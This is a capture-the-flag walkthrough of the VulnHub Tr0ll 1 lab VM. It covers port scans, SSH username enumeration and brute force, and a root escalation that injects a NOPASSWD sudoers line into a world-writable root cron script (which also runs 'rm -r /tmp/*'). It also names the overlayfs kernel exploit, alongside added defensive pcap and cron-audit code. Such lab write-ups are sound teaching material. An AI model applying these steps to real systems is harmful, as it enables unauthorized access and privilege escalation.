Introduction
Today I bring you another CTF; this one caught my attention on VulnHub because of its title, Tr0ll. You can download it from the following link:
https://www.vulnhub.com/entry/tr0ll-1,100/
Enumeration
A first port scan shows the following services open:
- ftp: anonymous user enabled and a file called lol.pcap
- http: a folder called /secret
- ssh
root@kali:/usr/local/src/Osmedeus# nmap -A 172.31.255.147
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-13 19:08 CET
Nmap scan report for 172.31.255.147
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.31.255.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:9D:1D:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.57 ms 172.31.255.147
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
We use nikto to discover possible hidden directories; it reports nothing new beyond the /secret we already got from nmap:
root@kali:~# nikto --host http://172.31.255.147
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.147
+ Target Hostname: 172.31.255.147
+ Target Port: 80
+ Start Time: 2019-01-13 19:11:30 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2019-01-13 19:11:42 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
If we go to the main web directory, the first troll appears:
And if we try to access the /secret directory, another one appears:
So we keep looking and go for the FTP. We connect and find the file lol.pcap:
root@kali:~# ftp 172.31.255.147
Connected to 172.31.255.147.
220 (vsFTPd 3.0.2)
Name (172.31.255.147:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap
226 Directory send OK.
We download the pcap:
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.01 secs (535.3609 kB/s)
We analyse the pcap with Wireshark and see that it is an FTP session with the anonymous user, which downloads the file secret_stuff.txt:
Inside the file secret_stuff.txt we find the following:
We try accessing it via the web and find a file, which we download:
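As an added example (not code from the original post) of what Wireshark shows here: a small Python parser that walks the pcap format, pulls the FTP control-channel commands out of each TCP packet and flags files retrieved over an anonymous login. The capture is constructed inline to mimic lol.pcap; the client/server IPs and port numbers are assumptions.

```python
import struct

def build_pcap(frames):
    """Wrap raw frames in a little-endian pcap file (link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1407542400 + i, 0, len(frame), len(frame)) + frame
    return out

def tcp_frame(src, dst, sport, dport, payload):
    """Constructed Ethernet/IPv4/TCP frame; checksums stay zero, the parser ignores them."""
    eth = bytes.fromhex("080027cd8827") + bytes.fromhex("0800279d1dfa") + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload

def ftp_commands(pcap):
    """Return (client_ip, command) for every payload sent to TCP port 21 in the capture."""
    endian = "<" if pcap[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet link type is handled")
    offset, found = 24, []
    while offset + 16 <= len(pcap):
        caplen = struct.unpack(endian + "IIII", pcap[offset:offset + 16])[2]
        frame = pcap[offset + 16:offset + 16 + caplen]
        offset += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4 over Ethernet, or not TCP
        tcp = 14 + (frame[14] & 0x0F) * 4          # IP header length from IHL
        sport, dport = struct.unpack("!HH", frame[tcp:tcp + 4])
        payload = frame[tcp + (frame[tcp + 12] >> 4) * 4:]   # skip TCP header (data offset)
        if dport == 21 and payload:
            found.append((".".join(str(b) for b in frame[26:30]),
                          payload.decode("ascii", "replace").strip()))
    return found

def anonymous_retrievals(commands):
    """Files fetched with RETR by clients that logged in as anonymous/ftp."""
    anon, files = set(), []
    for client, cmd in commands:
        verb, _, arg = cmd.partition(" ")
        if verb.upper() == "USER" and arg.lower() in ("anonymous", "ftp"):
            anon.add(client)
        elif verb.upper() == "RETR" and client in anon:
            files.append((client, arg))
    return files

# Constructed capture mirroring lol.pcap: anonymous login, then RETR of secret_stuff.txt.
CLIENT, SERVER = "172.31.255.129", "172.31.255.147"   # assumed addresses
SAMPLE_PCAP = build_pcap([
    tcp_frame(SERVER, CLIENT, 21, 40001, b"220 (vsFTPd 3.0.2)\r\n"),
    tcp_frame(CLIENT, SERVER, 40001, 21, b"USER anonymous\r\n"),
    tcp_frame(CLIENT, SERVER, 40001, 21, b"PASS password\r\n"),
    tcp_frame(SERVER, CLIENT, 21, 40001, b"230 Login successful.\r\n"),
    tcp_frame(CLIENT, SERVER, 40001, 21, b"RETR secret_stuff.txt\r\n"),
    tcp_frame(SERVER, CLIENT, 20, 40002, b"file body on the data channel\r\n"),
])

if __name__ == "__main__":
    for client, cmd in ftp_commands(SAMPLE_PCAP):
        print(client, cmd)
    print("anonymous downloads:", anonymous_retrievals(ftp_commands(SAMPLE_PCAP)))
```

Point it at a real file with `ftp_commands(open("lol.pcap", "rb").read())`; pcapng captures are not handled.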
# wget http://172.31.255.147/sup3rs3cr3tdirlol/roflmao
--2019-01-13 20:00:23-- http://172.31.255.147/sup3rs3cr3tdirlol/roflmao
Connecting to 172.31.255.147:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7296 (7,1K)
Saving to: ‘roflmao’
roflmao 100%[=============================>] 7,12K --.-KB/s in 0s
2019-01-13 20:00:23 (42,5 MB/s) - ‘roflmao’ saved [7296/7296]
It looks like a binary:
root@kali:/tmp# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
We give it execute permission and run it:
root@kali:/tmp# chmod +x roflmao
root@kali:/tmp# ./roflmao
Find address 0x0856BF to proceed
root@kali:/tmp#
At first I tried converting 0x0856BF from hexadecimal to decimal and other combinations, but I hit a wall. Until I tried entering it via the web, and bingo:
Inside each directory we find different files:
- Pass.txt: contains «Good_job_:)»
http://172.31.255.150/0x0856BF/this_folder_contains_the_password/Pass.txt
Good_job_:)
- which_one_lol.txt: a list of possible system users:
http://172.31.255.150/0x0856BF/good_luck/which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
The victim machine has an SSH version vulnerable to user enumeration:
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
We confirm it with searchsploit:
root@kali:/tmp# searchsploit openssh enumeration
-------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------- ----------------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | exploits/linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | exploits/linux/remote/45210.py
OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
OpenSSHd 7.2p2 - Username Enumeration | exploits/linux/remote/40113.txt
-------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
With Metasploit we load the user file which_one_lol.txt and exploit the vulnerability:
msf > search openssh
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/scanner/ssh/ssh_enumusers normal Yes SSH Username Enumeration
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE which_one_lol.txt
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.31.255.150
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.150:22 - SSH - Using malformed packet technique
[*] 172.31.255.150:22 - SSH - Starting scan
[+] 172.31.255.150:22 - SSH - User 'maleus' found
[+] 172.31.255.150:22 - SSH - User 'ps-aux' found
[+] 172.31.255.150:22 - SSH - User 'felux' found
[+] 172.31.255.150:22 - SSH - User 'Eagle11' found
[+] 172.31.255.150:22 - SSH - User 'genphlux' found
[+] 172.31.255.150:22 - SSH - User 'usmc8892' found
[+] 172.31.255.150:22 - SSH - User 'blawrg' found
[+] 172.31.255.150:22 - SSH - User 'wytshadow' found
[+] 172.31.255.150:22 - SSH - User 'vis1t0r' found
[+] 172.31.255.150:22 - SSH - User 'overflow' found
[*] Scanned 1 of 1 hosts (100% complete)
We confirm that the users exist on the system. We are going to try brute force with the users above and «Pass.txt» as the password, since the URL said «this_folder_contains_the_password». Be patient, because the victim machine has fail2ban enabled and will keep banning us every so often:
root@kali:/tmp# cat Pass.txt
Pass.txt
root@kali:~# nmap -p 22 --script ssh-brute --script-args userdb=/tmp/which_one_lol.txt,passdb=/tmp/Pass.txt,ssh-brute.timeout=4s 172.31.255.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 20:10 CET
NSE: [ssh-brute] Trying username/password pair: maleus:maleus
NSE: [ssh-brute] Trying username/password pair: ps-aux:ps-aux
NSE: [ssh-brute] Trying username/password pair: felux:felux
NSE: [ssh-brute] Trying username/password pair: Eagle11:eagle11
NSE: [ssh-brute] Trying username/password pair: genphlux:genphlux
NSE: [ssh-brute] Trying username/password pair: usmc8892:usmc8892
NSE: [ssh-brute] Trying username/password pair: blawrg:blawrg
NSE: [ssh-brute] Trying username/password pair: wytshadow:wytshadow
NSE: [ssh-brute] Trying username/password pair: vis1t0r:vis1t0r
NSE: [ssh-brute] Trying username/password pair: overflow:overflow
NSE: [ssh-brute] Trying username/password pair: maleus:Pass.txt
NSE: [ssh-brute] Trying username/password pair: ps-aux:Pass.txt
NSE: [ssh-brute] Trying username/password pair: felux:Pass.txt
NSE: [ssh-brute] Trying username/password pair: Eagle11:Pass.txt
NSE: [ssh-brute] Trying username/password pair: genphlux:Pass.txt
NSE: [ssh-brute] Trying username/password pair: usmc8892:Pass.txt
NSE: [ssh-brute] Trying username/password pair: blawrg:Pass.txt
NSE: [ssh-brute] Trying username/password pair: wytshadow:Pass.txt
NSE: [ssh-brute] Trying username/password pair: vis1t0r:Pass.txt
NSE: [ssh-brute] Trying username/password pair: overflow:Pass.txt
Nmap scan report for 172.31.255.149
Host is up (0.00039s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh-brute:
| Accounts:
| overflow:Pass.txt - Valid credentials
|_ Statistics: Performed 20 guesses in 70 seconds, average tps: 0.5
MAC Address: 08:00:27:CD:88:27 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 70.22 seconds
We now have the credentials, so we can connect via ssh:
root@kali:/tmp# ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
New release '16.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Sat Jan 26 11:22:49 2019 from 172.31.255.129
Could not chdir to home directory /home/overflow: No such file or directory
$
We open a bash shell:
$ /bin/bash
overflow@troll:/home$
Privilege escalation – Method 1
We start listing the possible ways to escalate privileges on the system.
We try sudo, but the user has no permissions assigned:
overflow@troll:/home$ sudo su
sudo: unable to resolve host troll
[sudo] password for overflow:
overflow is not in the sudoers file. This incident will be reported.
We look for files with the SUID bit set, without success:
overflow@troll:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/su
/bin/ping
/bin/fusermount
/bin/ping6
/bin/mount
/bin/umount
We list the processes running as root:
overflow@troll:/$ ps aux | grep root
root 1 0.0 0.4 4200 2256 ? Ss 10:28 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 10:28 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 10:28 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 10:28 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 10:28 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 10:28 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 10:28 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S 10:28 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 10:28 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 10:28 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 10:28 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 10:28 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 10:28 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 10:28 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 10:28 0:00 [kworker/u3:0]
root 18 0.0 0.0 0 0 ? S< 10:28 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 10:28 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 10:28 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 10:28 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 10:28 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 10:28 0:01 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 10:28 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 10:28 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 10:28 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? S 10:28 0:00 [fsnotify_mark]
root 29 0.0 0.0 0 0 ? S 10:28 0:00 [ecryptfs-kthrea]
root 30 0.0 0.0 0 0 ? S< 10:28 0:00 [crypto]
root 42 0.0 0.0 0 0 ? S< 10:28 0:00 [kthrotld]
root 44 0.0 0.0 0 0 ? S 10:28 0:00 [kworker/u2:1]
root 45 0.0 0.0 0 0 ? S 10:28 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 10:28 0:00 [scsi_eh_1]
root 47 0.0 0.0 0 0 ? S 10:28 0:00 [kworker/u2:2]
root 68 0.0 0.0 0 0 ? S< 10:28 0:00 [deferwq]
root 69 0.0 0.0 0 0 ? S< 10:28 0:00 [charger_manager]
root 121 0.0 0.0 0 0 ? S< 10:28 0:00 [kpsmoused]
root 122 0.0 0.0 0 0 ? S 10:28 0:00 [kworker/0:2]
root 123 0.0 0.0 0 0 ? S 10:29 0:00 [scsi_eh_2]
root 133 0.0 0.0 0 0 ? S< 10:29 0:00 [kworker/u3:1]
root 134 0.0 0.0 0 0 ? S 10:29 0:00 [jbd2/sda1-8]
root 135 0.0 0.0 0 0 ? S< 10:29 0:00 [ext4-rsv-conver]
root 265 0.0 0.1 3016 620 ? S 10:29 0:00 upstart-udev-bridge --daemon
root 270 0.0 0.2 12008 1444 ? Ss 10:29 0:00 /lib/systemd/systemd-udevd --daemon
root 368 0.0 0.3 4220 1712 ? Ss 10:29 0:00 /lib/systemd/systemd-logind
root 400 0.0 0.1 3024 604 ? S 10:29 0:00 upstart-file-bridge --daemon
root 502 0.0 0.1 2876 644 ? S 10:29 0:00 upstart-socket-bridge --daemon
root 619 0.0 0.4 5520 2320 ? Ss 10:29 0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 667 0.0 0.1 4784 956 ? Ss 10:29 0:00 /usr/sbin/vsftpd
root 758 0.0 0.1 4652 840 tty4 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty4
root 761 0.0 0.1 4652 852 tty5 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty5
root 764 0.0 0.1 4652 836 tty2 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty2
root 765 0.0 0.1 4652 844 tty3 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty3
root 767 0.0 0.1 4652 844 tty6 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty6
root 789 0.0 0.4 7800 2512 ? Ss 10:29 0:00 /usr/sbin/sshd -D
root 793 0.0 0.1 3060 824 ? Ss 10:29 0:00 cron
root 895 0.0 0.4 5616 2532 ? Ss 10:29 0:00 /usr/sbin/apache2 -k start
root 974 0.0 1.3 38660 6996 ? Sl 10:29 0:01 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid
root 1029 0.0 0.1 4652 848 tty1 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty1
root 1044 0.0 0.0 0 0 ? S 10:30 0:00 [kauditd]
root 1816 0.1 0.7 11200 3628 ? Ss 11:31 0:00 sshd: overflow [priv]
overflow 1846 0.0 0.1 4656 540 pts/0 S+ 11:31 0:00 grep root
The crontab file is protected against reading, so we cannot review its contents:
overflow@troll:/etc/cron.d$ cat /etc/crontab
cat: /etc/crontab: Permission denied
We don't find anything in the cron.d directory either:
overflow@troll:/etc/cron.d$ ls -liath
total 12K
12 drwxr-xr-x 86 root root 4.0K Jan 20 13:15 ..
348 drwxr-xr-x 2 root root 4.0K Aug 9 2014 .
349 -rw-r--r-- 1 root root 102 Feb 8 2013 .placeholder
We look for files writable by others, and two interesting ones show up:
overflow@troll:/$ find / -perm -o=w -type f 2>/dev/null
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
...........
/lib/log/cleaner.py
If we check the contents of cronlog, we see there is a script cleaner.py that runs every two minutes:
overflow@troll:/etc/cron.d$ cat /var/log/cronlog
*/2 * * * * cleaner.py
And the script in question:
overflow@troll:/etc/cron.d$ ls -liath /lib/log/cleaner.py
155826 -rwxrwxrwx 1 root root 96 Aug 13 2014 /lib/log/cleaner.py
overflow@troll:/etc/cron.d$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
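A defender's version of the check that exposes this weakness (an added example, not code from the original post): parse cron entries, resolve each command against a search path and flag scripts that unprivileged users can modify or replace. The temp-dir setup in demo() is constructed to mirror the 777 cleaner.py above; the search path is a parameter because, as shown, the real /etc/crontab is not readable to the overflow user.

```python
import os
import stat
import tempfile

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week

def parse_cron_line(line):
    """Split a cron line into (schedule, command); None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    parts = line.split(None, CRON_FIELDS)
    if len(parts) <= CRON_FIELDS:
        return None
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]

def resolve_command(command, search_path):
    """Locate the file behind the command's first word (bare names are looked up on search_path)."""
    exe = command.split()[0]
    candidates = [exe] if exe.startswith("/") else [os.path.join(d, exe) for d in search_path]
    return next((p for p in candidates if os.path.isfile(p)), None)

def writable_by_others(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def replaceable_dir(path):
    """World-writable directory without the sticky bit: anyone can swap the file out."""
    mode = os.stat(path).st_mode
    return bool(mode & stat.S_IWOTH) and not mode & stat.S_ISVTX

def audit_cron(cron_text, search_path):
    """Return (schedule, target, reason) findings for entries an unprivileged user could hijack."""
    findings = []
    for line in cron_text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        path = resolve_command(command, search_path)
        if path is None:
            findings.append((schedule, command, "command not found on search path"))
        elif writable_by_others(path):
            findings.append((schedule, path, "world-writable script"))
        elif replaceable_dir(os.path.dirname(path)):
            findings.append((schedule, path, "script sits in a world-writable directory"))
    return findings

def demo():
    """Constructed scenario: a mode-777 cleaner.py run every two minutes next to a sane 755 script."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "cleaner.py")
        with open(script, "w") as f:
            f.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
        os.chmod(script, 0o777)          # same mode as the page's /lib/log/cleaner.py
        safe = os.path.join(d, "rotate.sh")
        with open(safe, "w") as f:
            f.write("#!/bin/sh\ntrue\n")
        os.chmod(safe, 0o755)
        cronlog = "*/2 * * * * cleaner.py\n0 3 * * * rotate.sh\n# a comment\nMAILTO=root\n"
        return audit_cron(cronlog, [d])

if __name__ == "__main__":
    for schedule, target, reason in demo():
        print(f"{schedule:>12}  {target}  {reason}")
```

On a real host, feed it the readable pieces (/etc/cron.d/*, /var/spool/cron) and the PATH those files declare; only the first word of each command is checked, so wrappers like `python /lib/log/cleaner.py` need the interpreter's argument resolved as well.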
Taking advantage of the fact that we have write permission on the cleaner.py script, we are going to modify it; if we try to edit it with vi we get the following:
Found a swap file by the name "/var/tmp/cleaner.py.swp"
owned by: root dated: Wed Aug 13 01:16:40 2014
[cannot be read]
While opening file "/lib/log/cleaner.py"
dated: Wed Aug 13 00:13:39 2014
(1) Another program may be editing the same file. If this is the case,
be careful not to end up with two different instances of the same
file when making changes. Quit, or continue with caution.
(2) An edit session for this file crashed.
If this is the case, use ":recover" or "vim -r /lib/log/cleaner.py"
to recover the changes (see ":help recovery").
If you did this already, delete the swap file "/var/tmp/cleaner.py.swp"
to avoid this message.
Swap file "/var/tmp/cleaner.py.swp" already exists!
[O]pen Read-Only, (E)dit anyway, (R)ecover, (D)elete it, (Q)uit, (A)bort:
Since we don't have permission to delete the file /var/tmp/cleaner.py.swp, we'll use nano (much to my regret):
overflow@troll:/$ nano /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
    os.system('echo "overflow ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/overflow')
    os.system('chmod 0440 /etc/sudoers.d/overflow')
except:
    sys.exit()
What we are doing is granting sudo rights to the overflow user so it can run any command on the system without entering a password. In less than two minutes we see the «overflow» file appear in the sudoers.d directory:
overflow@troll:/$ ls -liath /etc/sudoers.d
total 16K
725 drwxr-xr-x 2 root root 4.0K Jan 26 11:48 .
39752 -r--r----- 1 root root 33 Jan 26 11:48 overflow
We open a new ssh session, run «sudo su» and we have root access to the system:
Privilege escalation – Method 2
We check the kernel version:
overflow@troll:/home$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
We look for exploits matching the kernel version:
root@kali:~# searchsploit Linux kernel 3.13
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13 - SGID Privilege Escalation | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loca | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loca | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit) | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Servi | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2 | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC) | exploits/linux/dos/31305.c
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
We copy it to the victim machine:
scp /usr/share/exploitdb/exploits/linux/local/37292.c [email protected]:/tmp/
We compile and run it:
Kernel exploitation is the one I always try to leave for last, since in my opinion it is the least «elegant» route.